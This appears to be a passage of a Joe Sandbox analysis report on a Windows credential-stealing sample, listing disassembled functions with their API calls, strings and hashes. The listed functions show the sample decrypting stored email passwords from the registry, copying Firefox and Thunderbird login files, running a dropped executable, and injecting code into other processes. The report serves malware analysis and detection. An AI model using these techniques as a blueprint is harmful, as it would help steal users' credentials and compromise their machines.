                                                                            • API ID: Message$Create$FileHandlelstrcatlstrlen$ClassCloseDirectoryDispatchDispatcherExceptionFindFirstFolderLocalModulePathRegisterTimeTranslateUserWindowlstrcpywsprintf
                                                                            • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                                            • API String ID: 3509704836-2372768292
                                                                            • Opcode ID: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                                                            • Instruction ID: 5c496a3f65fd177ded775e206ced170c84e42a303c2806b3eceb831f6cf01448
                                                                            • Opcode Fuzzy Hash: 4e13b100e2b3fe66040d78225b473c357b4793047b4bceb166c70d05fad76bb2
                                                                            • Instruction Fuzzy Hash: 51718172604304ABC320DBA5DC45EABB7FCEB89704F00492EF685E3291DB39D945CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004099FF Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 296registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,77C2E710,746B8250,00000000,?,004099C3), ref: 00409A81
                                                                            • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,77C2E710,746B8250), ref: 00409AC8
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00409B0C
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00409B50
                                                                            • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00409B94
                                                                            • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00409BD8
                                                                            • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00409C45
                                                                            • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 00409CB2
                                                                            • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00409D1F
                                                                              • Part of subcall function 00409D97: GlobalAlloc.KERNEL32(00000040,-00000001,77C2E730,?,?,?,00409D4B,00001000,?,00000000,00001000), ref: 00409DB5
                                                                              • Part of subcall function 00409D97: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409D4B), ref: 00409DEB
                                                                              • Part of subcall function 00409D97: lstrcpyW.KERNEL32 ref: 00409E22
                                                                              • Part of subcall function 00403373: lstrlenW.KERNEL32(77C30770,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,77C30770,00000000), ref: 0040337A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                                                            • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                                                            • API String ID: 6593746-2537589853
                                                                            • Opcode ID: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                                                            • Instruction ID: 7120254dbc2b6b4f3800d12c0dea7aeb6369d048fca86938223c4741ea706cc6
                                                                            • Opcode Fuzzy Hash: cc5f769d671623cbfaa9f0c516c5158cd819fe66edd51a48f4d1e9d80896eb4f
                                                                            • Instruction Fuzzy Hash: FFA11EB291011DAADB25EB91CD45FEF737CAF54744F1000BAF605F61C1EA78AB448BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00415169 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • LoadResource.KERNEL32(00000000,?,00000000), ref: 004151A4
                                                                            • SizeofResource.KERNEL32(00000000,?), ref: 004151B0
                                                                            • LockResource.KERNEL32(00000000), ref: 004151BA
                                                                            • GetTempPathA.KERNEL32(00000400,?), ref: 004151F4
                                                                            • lstrcatA.KERNEL32(?,find.exe), ref: 00415208
                                                                            • GetTempPathA.KERNEL32(00000400,?), ref: 00415216
                                                                            • lstrcatA.KERNEL32(?,find.db), ref: 00415224
                                                                            • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 0041523F
                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00415251
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00415258
                                                                            • wsprintfA.USER32 ref: 00415288
                                                                            • ShellExecuteExA.SHELL32(0000003C), ref: 004152D6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                            • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                            • API String ID: 2504251837-265381321
                                                                            • Opcode ID: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                                                            • Instruction ID: a64ecab57c3cf55662885f0afd46cea5e91dac6a4cbb1ef5118ba8298ebcf816
                                                                            • Opcode Fuzzy Hash: c968e0a10a2c1637be2f7f2b00f5e3c21a02e84e25c142268a7a615d38930b4a
                                                                            • Instruction Fuzzy Hash: C7411FB190021DABDB10DFA5DD85EDEBBBCFF89304F108166F609A2150DB749A858FA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A36F Relevance: 28.4, APIs: 5, Strings: 11, Instructions: 406filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040B87D: lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                              • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                              • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                              • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                              • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            • lstrcatW.KERNEL32(?,\firefox.exe), ref: 0040A3F1
                                                                            • GetBinaryTypeW.KERNEL32(?,?), ref: 0040A402
                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 0040A882
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                              • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                            • CopyFileW.KERNEL32(?,?,00000000,.tmp,00000000,004176A4,\logins.json,?), ref: 0040A579
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyDispatcherExceptionFileFreeOpenPrivateProfileQueryStringTypeUserValueVirtualwsprintf
                                                                            • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                                                            • API String ID: 1388061207-815594582
                                                                            • Opcode ID: 7d15d19be6ac79f8e36c5fca82ee3a93e3f70f5bdfbe81292ff5167ead634ef4
                                                                            • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                                                            • Opcode Fuzzy Hash: 7d15d19be6ac79f8e36c5fca82ee3a93e3f70f5bdfbe81292ff5167ead634ef4
                                                                            • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409E2D Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                              • Part of subcall function 0040B87D: lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                              • Part of subcall function 0040B87D: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                              • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                              • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                              • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            • GetBinaryTypeW.KERNEL32(?,?), ref: 00409EAC
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                                                              • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                                                              • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 0040AF08
                                                                            • GetPrivateProfileStringW.KERNEL32 ref: 0040A32F
                                                                              • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5,.dll,?,00409EC5,?,00000104,00000000), ref: 0040AF64
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                                                              • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                                                              • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$CurrentDirectory$ExistsFilePathlstrcpylstrlen$BinaryCloseDispatcherExceptionOpenPrivateProfileQueryStringTypeUserValuelstrcat
                                                                            • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                                                            • API String ID: 4293655490-1863067114
                                                                            • Opcode ID: ac11b98a5cca6887fcac6fbbf779f36bb9e8cc51d89a993c01f194de90ab722a
                                                                            • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                                                            • Opcode Fuzzy Hash: ac11b98a5cca6887fcac6fbbf779f36bb9e8cc51d89a993c01f194de90ab722a
                                                                            • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407B2E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 199injectionmemorywindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,00000000,00000000), ref: 00407B59
                                                                              • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                                                              • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                                                              • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                                                            • GetCurrentProcess.KERNEL32 ref: 00407B6D
                                                                              • Part of subcall function 004121DC: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 004121F1
                                                                              • Part of subcall function 004121DC: GetProcAddress.KERNEL32(00000000), ref: 004121F8
                                                                            • MessageBoxA.USER32 ref: 00407C7D
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040), ref: 00407CAD
                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407CCA
                                                                            • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407CE2
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407D05
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,0041E6C0,00001D44,?), ref: 00407D30
                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407D4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocCurrentMemoryWrite$AddressCreateHandleHeapMessageModuleOpenProcProtectRemoteThreadWow64
                                                                            • String ID: Debug$Injecting64$XXXXXX
                                                                            • API String ID: 1574360354-2389424830
                                                                            • Opcode ID: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                                                            • Instruction ID: d433ea0d1c2d4f6ec0602b92d9002377d3576233aac0b38f39bcf27655b0c8a4
                                                                            • Opcode Fuzzy Hash: 0e01dc1136dec1d6105c25c51067433d34393140dd2267df3ffc9b6bd3bf666a
                                                                            • Instruction Fuzzy Hash: 21519271E04205BBEB21A7618C45FBF7A7DEF85714F20417EF500B22D0E7B8AA45866E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413F7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81injectionmemorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,77C30770,00000000), ref: 00413F93
                                                                            • GetCurrentProcessId.KERNEL32 ref: 00413F9E
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 00413FBC
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 00413FE6
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00426208,00000800,00000000), ref: 00413FFE
                                                                            • VirtualProtectEx.KERNEL32(z?A,00000000,00000800,00000040,?), ref: 0041400F
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000103,00003000,00000004), ref: 00414026
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,00000103,00000000), ref: 0041403C
                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0041404F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                                            • String ID: z?A
                                                                            • API String ID: 900395357-4280446894
                                                                            • Opcode ID: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                                                            • Instruction ID: b1c18d8d0f2f4188799d6c91686f228e56c1b6c845ed563d7edeb039f8378cf2
                                                                            • Opcode Fuzzy Hash: 39b68639bc109fc8f5c87fe2977afb9284191657715236c718eec5a075db1d2a
                                                                            • Instruction Fuzzy Hash: A1216F71644218BEF7209B51DC4AFEB7F7CEB44720F2041B6B604AA0D0DAF46E408AA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D3A8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                                                            • GetLastError.KERNEL32 ref: 0040D3F0
                                                                            • Sleep.KERNEL32(000007D0), ref: 0040D402
                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                                                            • String ID: ServicesActive
                                                                            • API String ID: 104619213-3071072050
                                                                            • Opcode ID: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                                                            • Instruction ID: 984c0b14d8c5f8436b4892bcd3ae393994a7e81e733ff7ebf7d643affbd23cba
                                                                            • Opcode Fuzzy Hash: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                                                            • Instruction Fuzzy Hash: 87014F35B083657BD6211BB6AC8CE9B3E7DDBC9B51B014076FA05E2290CA78980586B9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D8FB Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167servicestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040D922
                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040D959
                                                                              • Part of subcall function 00406045: GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 00406048
                                                                              • Part of subcall function 00406045: RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 0040604F
                                                                            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040D982
                                                                            • GetLastError.KERNEL32 ref: 0040D98C
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D99A
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040DA5B
                                                                            • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040DA9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                                                            • String ID: ServicesActive
                                                                            • API String ID: 899334174-3071072050
                                                                            • Opcode ID: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                                                            • Instruction ID: 4627b5c660ce4a60c95ced9edd5d001cb4fcdfcb4ede8c399349bdd6508d6144
                                                                            • Opcode Fuzzy Hash: aa88f2381a8379f9ef7fbe07b50d8f823752e6264afa939dd2859f9f5f34ee48
                                                                            • Instruction Fuzzy Hash: 85511CB1D00219AFDB15DFE1C896BEFBBB8AF18305F10017AE502B62D1DB785A45CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407D5E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97injectionmemorythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 00407D8C
                                                                              • Part of subcall function 0040FB98: GetCurrentProcess.KERNEL32(0042697C,00407B45,00000000,00000000,00000000), ref: 0040FB9D
                                                                              • Part of subcall function 0040FB98: IsWow64Process.KERNEL32(00000000), ref: 0040FBA4
                                                                              • Part of subcall function 0040FB98: GetProcessHeap.KERNEL32 ref: 0040FBAA
                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 00407DB0
                                                                            • VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 00407DD1
                                                                            • VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 00407DE9
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 00407E13
                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407E3B
                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407E53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                                            • String ID: XXXXXX
                                                                            • API String ID: 813767414-582547948
                                                                            • Opcode ID: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                                                            • Instruction ID: c495f5495fef9a669d461779a70b0afaaa39668d7629f65417ca4a490480110a
                                                                            • Opcode Fuzzy Hash: b37eab9ef3b4ace79a3b066072094820bbd7040eabfb987d4398ce6d9e516cc8
                                                                            • Instruction Fuzzy Hash: 26219371A49205BAEB2157A0DC05FBF7A7CAF44B55F2041B6FA10F11D0D7B8AE0086BE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040955B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000), ref: 0040957C
                                                                            • PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                                                            • PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                                                            • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                                                              • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                                                              • Part of subcall function 00409244: GetLastError.KERNEL32 ref: 0040926E
                                                                              • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000), ref: 00409275
                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                                            • String ID: .$Accounts\Account.rec0
                                                                            • API String ID: 3873318193-2526347284
                                                                            • Opcode ID: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                                                            • Instruction ID: bc3515f8d3d8780f40bb8a30baa7d5921dca78d5fe5a5665ce25a30cdb5b99d6
                                                                            • Opcode Fuzzy Hash: e3be3eae2ca6ed700056314c56cb9799dab408cb93910242309d82db515b9b61
                                                                            • Instruction Fuzzy Hash: A71142B2A0022C6BDB20D7A4DC89FEB777CEB45714F5045E7E505E3181E7789E888E68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D33C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D34B
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0040D360
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D36D
                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040D386
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39A
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D39D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                            • String ID: ServicesActive
                                                                            • API String ID: 493672254-3071072050
                                                                            • Opcode ID: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                                                            • Instruction ID: 1675453761964aa3b76a2eaeb2c7b583256337f413fea86e2beca60fa8f39388
                                                                            • Opcode Fuzzy Hash: c4ce248089d705e5acf75914af0f3f1b1fac63e6aab84437131e5122b90e0dce
                                                                            • Instruction Fuzzy Hash: 3FF0FC3170432577C7211B76AC48EDB3F6CDBCA7707014232FA11E22D0CA74CC0586A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004060B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004060B5
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004060C1
